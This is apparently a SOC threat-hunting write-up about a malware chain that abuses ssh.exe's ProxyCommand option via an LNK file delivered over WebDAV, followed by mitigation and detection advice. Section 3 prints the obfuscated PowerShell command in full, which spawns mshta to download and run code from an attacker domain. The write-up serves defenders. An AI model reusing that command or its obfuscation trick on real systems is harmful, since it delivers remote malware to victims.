Hunter-Case-01 - SSH Proxy Command Lolbas
1.) Information
Hunter Blue's day started with an interesting Case we had seen on an infected Device later also seen on many others which was not Prevented neither Detected or alerted by XDR System.
This is the reason why you should check the initial entry point on a malware infection and don't trust blindly only on EDR or XDR Systems Detections.
You should investigate the initial Entry and Execution to search through the logs with these IoCs / IoAs to find the right artifacts for Threat Hunting.
1.1) Information Links and Research
Lolbas SSH Option to use ProxyCommand: https://lolbas-project.github.io/lolbas/Binaries/Ssh/
SSH Option to use ProxyCommand: https://man.openbsd.org/ssh
Dynamic Malware Analysis for such files uploaded by other infected Companies before https://any.run/report/39fcf6143a801de8acba009ef69ac4f7b533d8e1b91337547ca578f2b7117534/11a68474-4e9a-4070-9b23-b8d244c9fc02
-> Further Research: https://any.run/cybersecurity-blog/client-side-exploitation/
-> Further Intensive and best Research Information about the same Case we saw: https://cyble.com/blog/threat-actor-targets-manufacturing-industry-with-malware/
2.) Attack Chain
Other Seen Infection Chains from our Cases
3.) Initial Access
UPDATE 06122024: In our case we have seen in SOC is that the user was surfing through the internet and searching for some manuals and found a PDF link which he then clicked on and started the initial infection chain.
Infection chain where a user downloaded an LNK file first (via the rundll32.exe WebDAV method).
The LNK file will run ssh.exe (C:\Windows\System32\OpenSSH\ssh.exe) with the following parameter:
"-o ProxyCommand= "powershell powershell -Command ('msh]]]]]]]t]]]]]]]a.e]]]]]]x]]]]]]e ]]]]]]h]]]]]tt]]]]]]p]]]]]s:]]]]]]/]]]]]]]/berb.f]]]]]it]]]]]n]]]]]]]e]]]]]]]ssclu]]]]]]]b]]]]]]]-]]]]]f]]]]]]il]]]]]m]]]]]]fan]]]]]atics]]]]].co]]]]]]m]]]]]/]]]]]]z.]]]]]]]m]]]]]p]]]]]]]4]]]]]]' -replace']')".
Obfuscated Powershell
The PowerShell command will spawn mshta.exe, thus downloading and executing additional code on the host:
mshta.exe hxxps[:]//berb.fitnessclub-filmfanatics.com/z[.]mp4
Malicious mp4 File Downloaded
4.) Finding through Threat Hunting
The Powershell Script was blocked by the XDR System but if you only trust in this Event you will not find the golden information behind this Attack
We hunted through the Datalake logs in the whole infrastructure and, yes you guess it right, we found another host executing the same stuff to download the malicious file from this WebDav Server but nothing was Detected or Blocked until the obfuscated Powershell execution.
5.) Mitigation
The initial breach may occur via spam emails.
Limit Email Attachements to known and legit files (Whitelisting and no Blacklisting) on Email GW
UPDATE 06122024: In our case we have seen in SOC is that the user was surfing through the internet and searching for some manuals and found a PDF link which he then clicked on and started the initial infection chain.
Therefore Awareness Trainings is essential in your company to teach your users in an easy way how such malicious operations are executed (Do some fun Awareness Campaigns so that your users learn something and do not blame them as they do not know these attacks ;) )
Attack Surface Reduction Rules for Application to reduce the execution chain of malicious files
Application Control to block malicious executions or Next Gen WDAC
Monitor for WebDAV Requests as it is using HTTP and blocking SMB to outside will not reduce this attack
Consider disabling the execution of shortcut files (.lnk) originating from remote locations, such as WebDAV links, or implementing policies that require explicit user consent before executing such files.
Exercise Caution: Only download and open files from trusted and verified sources.
Check File Extensions: Ensure files have appropriate extensions before opening (e.g., .pdf for PDFs).
Report Suspicious Activity: If you encounter unexpected files or activities, report them immediately for further investigation.
6.) Detection and Hunting
Hunting for malicious "ProxyCommand=" values within the SSH arguments.
Hunting for ~ davclnt.dll,DavSetCookie download Commands should be definitely operated in your environment -> see executed Command
Also my colleague from Incident Response Team explained it in his Blogpost: https://dfir.ch/posts/search-ms_protocol_handler/ if you want to check how such commands are misused by Threat Actors.
Specific indicators include the use of the search-ms URI protocol in HTML files, unexpected pop-ups requesting access to Windows Explorer, and subsequent attempts to access remote servers using the WebDAV protocol.
Monitoring for the creation or execution of LNK files pointing to batch scripts will also be a focus.
6.1) Sigma Rules
6.2) Yara Rules
6.3) Hunting Queries Tanium
6.4) Hunting Queries Defender XDR
7.) Conclusion and Learning for a Hunter Blue
The EDR on this host didn't pick up the malicious WebDAV commands, showcasing how fruitful threat hunting can be.
Last updated